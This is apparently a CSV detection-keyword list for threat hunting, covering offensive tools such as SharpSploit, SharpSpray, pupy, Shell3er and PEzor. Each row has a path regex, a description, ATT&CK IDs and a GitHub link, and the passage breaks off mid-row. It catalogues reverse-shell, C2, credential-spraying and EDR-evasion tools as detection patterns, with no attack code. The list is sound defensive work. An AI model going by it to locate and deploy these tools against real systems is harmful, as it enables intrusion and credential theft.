"*/SharpSploit.git*",".{0,1000}\/SharpSploit\.git.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","1","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*/SharpSploit/*",".{0,1000}\/SharpSploit\/.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","1","N/A","10","10","1057","150","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" "*/SharpSploitConsole.git*",".{0,1000}\/SharpSploitConsole\.git.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","1","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*/SharpSpoolTrigger*",".{0,1000}\/SharpSpoolTrigger.{0,1000}","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","5","408","52","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" "*/SharpSpray.exe*",".{0,1000}\/SharpSpray\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpSpray.exe*",".{0,1000}\/SharpSpray\.exe.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" "*/sharpspray.exe*",".{0,1000}\/sharpspray\.exe.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","1","N/A","10","2","125","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z" "*/SharpSpray.git*",".{0,1000}\/SharpSpray\.git.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","1","N/A","10","2","125","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z" "*/SharpSpray-1.1.zip*",".{0,1000}\/SharpSpray\-1\.1\.zip.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","1","N/A","10","2","125","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z" "*/SharpSQLPwn.exe*",".{0,1000}\/SharpSQLPwn\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpStay.exe*",".{0,1000}\/SharpStay\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpStay.git*",".{0,1000}\/SharpStay\.git.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","1","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*/SharpStay/*",".{0,1000}\/SharpStay\/.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","1","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*/SharpSvc.exe*",".{0,1000}\/SharpSvc\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpSword.git*",".{0,1000}\/SharpSword\.git.{0,1000}","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","8","10","114","12","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" "*/SharpSword/SharpSword*",".{0,1000}\/SharpSword\/SharpSword.{0,1000}","offensive_tool_keyword","cobaltstrike","Read the contents of DOCX files using Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","10","10","114","12","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" "*/SharpSystemTriggers*",".{0,1000}\/SharpSystemTriggers.{0,1000}","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","5","408","52","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" "*/SharpTask.exe*",".{0,1000}\/SharpTask\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpTerminator/*",".{0,1000}\/SharpTerminator\/.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","289","59","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" "*/SharpTokenFinder.exe*",".{0,1000}\/SharpTokenFinder\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpUnhooker.git*",".{0,1000}\/SharpUnhooker\.git.{0,1000}","offensive_tool_keyword","SharpUnhooker","C# Based Universal API Unhooker","T1055.012 - T1070.004 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GetRektBoy724/SharpUnhooker","1","1","N/A","9","4","379","76","2022-02-18T13:11:11Z","2021-05-17T01:33:38Z" "*/SharpUp.exe*",".{0,1000}\/SharpUp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpUp.git*",".{0,1000}\/SharpUp\.git.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","1","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*/SharpView.exe*",".{0,1000}\/SharpView\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpView.git*",".{0,1000}\/SharpView\.git.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","10","10","921","179","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z" "*/SharpWebServer.exe*",".{0,1000}\/SharpWebServer\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpWifiGrabber.exe*",".{0,1000}\/SharpWifiGrabber\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpWMI.exe*",".{0,1000}\/SharpWMI\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpWSUS*",".{0,1000}\/SharpWSUS.{0,1000}","offensive_tool_keyword","SharpWSUS","SharpWSUS is a CSharp tool for Lateral Movement through WSUS","T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nettitude/SharpWSUS","1","1","N/A","N/A","5","428","72","2022-11-20T23:41:40Z","2022-05-04T08:27:57Z" "*/SharPyShell*",".{0,1000}\/SharPyShell.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*/SharpZeroLogon.exe*",".{0,1000}\/SharpZeroLogon\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/shell/password.go*",".{0,1000}\/shell\/password\.go.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6497","579","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z" "*/shell/shell_port.*",".{0,1000}\/shell\/shell_port\..{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*/shell?k=*&ip=*&cmd=*",".{0,1000}\/shell\?k\=.{0,1000}\&ip\=.{0,1000}\&cmd\=.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*/shell_exec.py*",".{0,1000}\/shell_exec\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/Shell3er.git*",".{0,1000}\/Shell3er\.git.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","1","N/A","9","10","59","12","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" "*/Shell3er.ps1*",".{0,1000}\/Shell3er\.ps1.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","1","N/A","9","10","59","12","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" "*/Shell3er/*",".{0,1000}\/Shell3er\/.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059.001 - T1021.004 - T1090.002","TA0002 - TA0011","N/A","N/A","shell spawning","https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1","1","1","N/A","N/A","10","59","12","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" "*/shellcode*loader.bin*",".{0,1000}\/shellcode.{0,1000}loader\.bin.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*/shellcode.bin*",".{0,1000}\/shellcode\.bin.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*/shellcode.bin.*",".{0,1000}\/shellcode\.bin\..{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*/shellcode.hex*",".{0,1000}\/shellcode\.hex.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*/shellcode.hpp*",".{0,1000}\/shellcode\.hpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*/shellcode_callback.exe*",".{0,1000}\/shellcode_callback\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/shellcode_excel*",".{0,1000}\/shellcode_excel.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/ShellCode_Loader*",".{0,1000}\/ShellCode_Loader.{0,1000}","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 